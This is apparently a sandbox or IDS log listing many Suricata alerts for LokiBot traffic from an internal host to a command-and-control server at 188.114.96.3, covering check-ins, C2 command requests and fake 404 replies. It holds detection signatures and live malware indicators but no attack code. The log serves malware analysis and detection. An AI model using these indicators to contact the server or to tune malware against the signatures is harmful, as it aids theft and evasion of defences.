Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49709
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49780 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49780 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49780 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49763 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49763 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49792 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49763 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49875 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49875 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49757 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49893 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49786 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49853 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49786 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49706 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49792 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49708
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49763 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49780 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49780 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49757 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49757 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49757 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49710 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49792
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49875 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49875 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49853 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49710 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49710 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49735 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49735
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49786 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49859 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49763
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49780
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49706
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49757
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49893
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49853 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49853 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49899 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49710 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49710 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49774
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49881 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49881 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49798 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49798 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49875
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49845 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49899
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49786 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49853
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49845 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49859 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49859 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49972 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49786
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49798 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49859 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49859 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49798 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49710
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49881 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49707 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49972
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49798 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49832 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49826 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49826 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49995 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49845 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49963 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49707
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49826 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49995 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49859
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49845 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49845 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50002 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49832 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50002 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50002 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49826 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50010 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49995 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49826 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49968 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49798
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49832 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50019 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49820 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49820 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49820 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50010 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49832 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49941 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49832 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49941
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50046 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50046 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50013 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50019 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50013 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50035 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50035 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49968
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49983 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49983 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49745 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49806 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49806 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49806 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49980 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50044 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49963
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49806 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49820 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49806 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50023 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50044 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50019 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49983 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50035 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49925 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49990 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49995 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50048 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49995 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49820 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49990 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50010 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50013 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49990 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 188.114.96.3:80 -> 192.168.2.5:49995
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50024 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50019 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49983 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49983 -> 188.114.96.3:80
